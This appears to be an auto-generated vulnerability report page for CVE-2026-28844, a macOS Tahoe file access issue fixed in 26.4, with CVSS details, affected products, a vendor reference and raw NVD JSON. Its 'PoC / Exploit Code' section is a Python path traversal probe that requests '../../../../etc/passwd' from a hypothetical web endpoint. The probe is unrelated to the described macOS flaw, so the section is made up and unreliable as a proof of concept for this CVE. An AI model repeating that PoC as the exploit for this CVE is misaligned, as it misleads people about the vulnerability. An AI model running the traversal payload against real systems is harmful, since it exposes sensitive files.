Security Vulnerability Report
CVE-2026-28844 CVSS 6.5 MEDIUM

CVE-2026-28844

Published: 2026-03-25 01:17:09
Last Modified: 2026-03-25 18:29:51

Description

A file access issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.4. An attacker may gain access to protected parts of the file system.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-28844: macOS File Access Vulnerability
# This is a conceptual demonstration of a path traversal attempt.
import requests


def check_vulnerability(target_url):
    # Hypothetical endpoint vulnerable to path traversal
    # Payload attempts to escape the web root to access /etc/passwd
    traversal_payload = '../../../../etc/passwd'
    params = {
        'file': traversal_payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=5)
        if 'root:' in response.text:
            print(f"[+] Potential vulnerability detected at {target_url}")
            print(f"[+] Response snippet: {response.text[:100]}")
        else:
            print("[-] Target does not appear to be vulnerable.")
    except Exception as e:
        print(f"[!] Error during request: {e}")


# Example usage (Replace with actual vulnerable endpoint if known)
# check_vulnerability("http://localhost:8080/vulnerable_endpoint")

References

https://support.apple.com/en-us/126794 (Release Notes, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28844", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:09.180", "lastModified": "2026-03-25T18:29:51.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A file access issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.4. An attacker may gain access to protected parts of the file system."}, {"lang": "es", "value": "Un problema de acceso a archivos se abordó con una validación de entrada mejorada. Este problema está solucionado en macOS Tahoe 26.4. Un atacante podría obtener acceso a partes protegidas del sistema de archivos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "DCFD15D9-91CA-4342-9F7E-A219B459B755"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}